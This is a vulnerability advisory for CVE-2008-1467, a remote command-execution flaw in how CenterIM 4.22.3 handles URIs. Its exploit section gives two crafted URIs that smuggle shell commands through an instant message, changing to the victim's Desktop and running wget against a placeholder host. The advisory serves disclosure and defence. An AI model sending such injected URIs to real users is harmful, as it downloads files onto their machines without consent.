CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
BID:28362
Info
CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 28362 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1467 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 20 2008 12:00AM |
| Updated: | Apr 13 2015 09:49PM |
| Credit: | Brian Fonfara (w00) <[email protected]> |
| Vulnerable: |
Redhat Fedora 7 CenterIM CenterIM 4.22.3 |
| Not Vulnerable: | |
Discussion
CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
CenterIM is prone to a remote command-execution vulnerability.
Successful exploits can allow arbitrary commands to run in the context of the affected application.
CenterIM 4.22.3 is vulnerable; other versions may be affected as well.
CenterIM is prone to a remote command-execution vulnerability.
Successful exploits can allow arbitrary commands to run in the context of the affected application.
CenterIM 4.22.3 is vulnerable; other versions may be affected as well.
Exploit / POC
CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
An attacker can use an instant-message client to carry out attacks.
The following example URIs are available:
If the victim's browser is already open - http://www.example.com)';cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com;'(
If the victim's browser is not open - http://http://www.example.com/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com"
An attacker can use an instant-message client to carry out attacks.
The following example URIs are available:
If the victim's browser is already open - http://www.example.com)';cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com;'(
If the victim's browser is not open - http://http://www.example.com/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com"
Solution / Fix
CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
Solution:
Vendor advisories are available. Please see the references for more information.
Solution:
Vendor advisories are available. Please see the references for more information.
References
CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability
References:
References:
- Vendor Homepage (CenterIM)